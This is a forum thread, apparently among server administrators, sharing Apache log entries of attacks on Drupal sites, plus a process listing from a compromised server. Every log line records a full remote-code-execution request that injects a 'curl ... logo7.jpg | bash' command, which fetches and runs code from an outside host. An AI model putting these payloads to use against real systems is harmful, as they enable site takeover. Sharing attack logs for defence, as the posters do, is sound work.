185.38.150.119 - - [25/Apr/2018:21:08:22 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://yourvideoshare.net/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25261
185.38.150.119 - - [25/Apr/2018:21:08:34 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://yourvideoshare.net/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25261
79.117.205.160 - - [28/Apr/2018:02:40:05 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://62.210.88.83/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25237
79.117.205.160 - - [28/Apr/2018:03:00:44 -0400] "POST //user/password/?name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://62.210.88.83/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25219
[29/Apr/2018:20:39:02 -0400] 185.169.255.18 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://azadarimarkaz.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25257
[01/May/2018:11:00:24 -0400] 86.127.10.162 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://azadarimarkaz.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25257
[24/Apr/2018:18:22:34 -0400] 81.92.203.123 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25249
[24/Apr/2018:22:20:01 -0400] 81.92.203.123 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25249
[25/Apr/2018:11:46:21 -0400] 185.38.150.119 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25249
[25/Apr/2018:21:08:22 -0400] 185.38.150.119 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://yourvideoshare.net/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25261
[25/Apr/2018:21:08:34 -0400] 185.38.150.119 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://yourvideoshare.net/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25261
[28/Apr/2018:02:40:05 -0400] 79.117.205.160 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://62.210.88.83/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25237
[28/Apr/2018:03:00:44 -0400] 79.117.205.160 TLSv1 DHE-RSA-AES128-SHA "POST //user/password/?name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://62.210.88.83/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25219
[root@XXXX httpd]#

More logs to inspect:

Interesting Drupal attacks out there. Pretty sure it is implied but patch your Drupal, https://www.drupal.org/security
 
Last edited:

Jackbox

Active Member
Jan 2, 2016
197
96
74
Ultimately, looks like this in ps aux.

Code:
apache   15666  0.0  0.0   9228  1052 ?        Ss   16:07   0:00 /bin/sh -c curl -s http://azadarimarkaz.com/logo7.jpg | bash -s
apache   15667  0.0  0.0  75604  2092 ?        S    16:07   0:00 curl -s http://azadarimarkaz.com/logo7.jpg
apache   15668  0.0  0.0   9228   980 ?        S    16:07   0:00 bash -s
 
Top